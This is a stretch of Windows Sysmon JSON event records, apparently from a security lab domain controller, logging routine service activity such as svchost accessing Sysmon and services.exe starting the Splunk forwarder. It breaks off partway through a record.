{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.887\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.887","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1272\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1272","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT